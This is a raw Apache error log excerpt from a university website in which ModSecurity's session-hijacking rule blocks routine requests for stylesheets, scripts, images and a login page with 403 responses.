[Mon Aug 28 08:09:13.002739 2023] [:error] [pid 38059] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzucCo-f0AAJSr2soAAAAO"]
[Mon Aug 28 08:09:17.430241 2023] [:error] [pid 37803] [client 125.164.16.55] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvzvcCo-f0AAJOr96AAAAAL"]
[Mon Aug 28 08:09:17.430819 2023] [:error] [pid 38114] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvzvcCo-f0AAJTinaMAAAAE"]
[Mon Aug 28 08:09:17.444755 2023] [:error] [pid 38195] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvzvcCo-f0AAJUz@k0AAAAM"]
[Mon Aug 28 08:09:17.462646 2023] [:error] [pid 38196] [client 125.164.16.55] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvzvcCo-f0AAJU0qZkAAAAD"]
[Mon Aug 28 08:09:17.462900 2023] [:error] [pid 38075] [client 125.164.17.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvzvcCo-f0AAJS7R4gAAAAB"]
[Mon Aug 28 08:09:17.463881 2023] [:error] [pid 38059] [client 125.164.22.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvzvcCo-f0AAJSr2ssAAAAO"]
[Mon Aug 28 08:09:17.483602 2023] [:error] [pid 38114] [client 125.164.20.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvzvcCo-f0AAJTinaQAAAAE"]
[Mon Aug 28 08:09:17.488017 2023] [:error] [pid 38195] [client 125.164.22.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvzvcCo-f0AAJUz@k4AAAAM"]
[Mon Aug 28 08:09:17.488769 2023] [:error] [pid 38075] [client 125.164.18.164] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvzvcCo-f0AAJS7R4kAAAAB"]
[Mon Aug 28 08:09:17.506345 2023] [:error] [pid 38196] [client 125.164.19.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvzvcCo-f0AAJU0qZoAAAAD"]
[Mon Aug 28 08:09:17.525890 2023] [:error] [pid 37803] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvzvcCo-f0AAJOr96EAAAAL"]
[Mon Aug 28 08:09:17.552736 2023] [:error] [pid 38059] [client 125.164.20.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzvcCo-f0AAJSr2swAAAAO"]
[Mon Aug 28 08:09:30.336595 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzysCo-f0AAJU0qZ4AAAAD"]
[Mon Aug 28 08:09:30.557083 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzysCo-f0AAJTinagAAAAE"]
[Mon Aug 28 08:10:51.225584 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0G8Co-f0AAJUGIVYAAAAC"]
[Mon Aug 28 08:10:51.232070 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv0G8Co-f0AAJWfZG4AAAAI"]
[Mon Aug 28 08:10:51.259153 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@oAAAAG"]
[Mon Aug 28 08:10:51.259183 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv0G8Co-f0AAJWeoSoAAAAF"]
[Mon Aug 28 08:10:51.268594 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv0G8Co-f0AAJSr2t0AAAAO"]
[Mon Aug 28 08:10:51.337515 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0G8Co-f0AAJU0qasAAAAD"]
[Mon Aug 28 08:10:51.337515 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0G8Co-f0AAJOr97QAAAAL"]
[Mon Aug 28 08:10:51.337542 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv0G8Co-f0AAJSxYykAAAAH"]
[Mon Aug 28 08:10:51.338807 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0G8Co-f0AAJWfZG8AAAAI"]
[Mon Aug 28 08:10:51.362401 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@sAAAAG"]
[Mon Aug 28 08:10:51.367410 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0G8Co-f0AAJSxYyoAAAAH"]
[Mon Aug 28 08:10:51.370650 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0G8Co-f0AAJWfZHAAAAAI"]
[Mon Aug 28 08:10:51.374614 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0G8Co-f0AAJOr97UAAAAL"]
[Mon Aug 28 08:10:51.383249 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0G8Co-f0AAJSr2t4AAAAO"]
[Mon Aug 28 08:10:51.390050 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0G8Co-f0AAJUGIVcAAAAC"]
[Mon Aug 28 08:10:51.394399 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0G8Co-f0AAJU0qawAAAAD"]
[Mon Aug 28 08:10:51.395413 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv0G8Co-f0AAJSxYysAAAAH"]
[Mon Aug 28 08:10:51.396222 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0G8Co-f0AAJOr97YAAAAL"]
[Mon Aug 28 08:10:51.401093 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv0G8Co-f0AAJWfZHEAAAAI"]
[Mon Aug 28 08:10:51.415450 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv0G8Co-f0AAJUFNTUAAAAA"]
[Mon Aug 28 08:10:51.417285 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@wAAAAG"]
[Mon Aug 28 08:10:51.424228 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv0G8Co-f0AAJOr97cAAAAL"]
[Mon Aug 28 08:10:51.425214 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv0G8Co-f0AAJWfZHIAAAAI"]
[Mon Aug 28 08:10:51.444361 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv0G8Co-f0AAJSxYywAAAAH"]
[Mon Aug 28 08:10:51.447471 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv0G8Co-f0AAJSr2t8AAAAO"]
[Mon Aug 28 08:10:51.453114 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv0G8Co-f0AAJOr97gAAAAL"]
[Mon Aug 28 08:10:51.454961 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv0G8Co-f0AAJWfZHMAAAAI"]
[Mon Aug 28 08:10:51.480370 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@0AAAAG"]
[Mon Aug 28 08:10:51.481210 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv0G8Co-f0AAJOr97kAAAAL"]
[Mon Aug 28 08:10:51.509178 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv0G8Co-f0AAJSr2uAAAAAO"]
[Mon Aug 28 08:10:51.510452 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv0G8Co-f0AAJWfZHQAAAAI"]
[Mon Aug 28 08:10:51.538704 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@4AAAAG"]
[Mon Aug 28 08:10:51.561309 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv0G8Co-f0AAJUGIVgAAAAC"]
[Mon Aug 28 08:10:51.566764 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv0G8Co-f0AAJUFNTYAAAAA"]
[Mon Aug 28 08:10:51.579273 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv0G8Co-f0AAJSr2uEAAAAO"]
[Mon Aug 28 08:10:51.591943 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0G8Co-f0AAJWfZHUAAAAI"]
[Mon Aug 28 08:10:51.595265 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0G8Co-f0AAJOr97oAAAAL"]
[Mon Aug 28 08:10:51.618481 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0G8Co-f0AAJSxYy0AAAAH"]
[Mon Aug 28 08:10:51.620221 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0G8Co-f0AAJUFNTcAAAAA"]
[Mon Aug 28 08:10:51.621063 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0G8Co-f0AAJWfZHYAAAAI"]
[Mon Aug 28 08:10:51.622852 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0G8Co-f0AAJOr97sAAAAL"]
[Mon Aug 28 08:10:51.652919 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@8AAAAG"]
[Mon Aug 28 08:10:51.691968 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0G8Co-f0AAJUFNTgAAAAA"]
[Mon Aug 28 08:10:51.699548 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0G8Co-f0AAJUGIVkAAAAC"]
[Mon Aug 28 08:10:51.726631 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0G8Co-f0AAJU0qa0AAAAD"]
[Mon Aug 28 08:10:51.753158 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv0G8Co-f0AAJKjZ-AAAAAG"]
[Mon Aug 28 08:10:51.754639 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv0G8Co-f0AAJUGIVoAAAAC"]
